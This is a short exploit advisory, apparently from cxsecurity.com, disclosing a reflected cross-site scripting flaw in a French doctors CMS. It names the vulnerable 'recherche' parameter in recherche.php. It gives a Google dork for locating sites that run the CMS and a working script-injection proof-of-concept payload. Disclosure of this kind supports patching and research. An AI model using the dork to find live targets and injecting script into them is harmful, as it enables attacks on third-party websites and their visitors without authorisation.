French doctors CMS cross-site scripting

Published: 2017.01.20
Credit: Ashiyane Digital Security Team
Risk: Low
CWE: CWE-79
CVE: N/A
Local: No
Remote: Yes
Dork: intext:"Mentions légales" inurl:"recherche.php?recherche="

######################
# Exploit Title : French doctors CMS cross-site scripting
# Exploit Author : Ashiyane Digital Security Team
# Google Dork : intext:"Mentions légales" inurl:"recherche.php?recherche="
# Date: 01-12-2016
# Tested On : Windows 7 / Firefox
# Vulnerable parameter : recherche (GET) in recherche.php, reflected into the search page without output encoding
# PoC payload : "><script>alert(/XSS/)</script>
######################


Copyright 2017, cxsecurity.com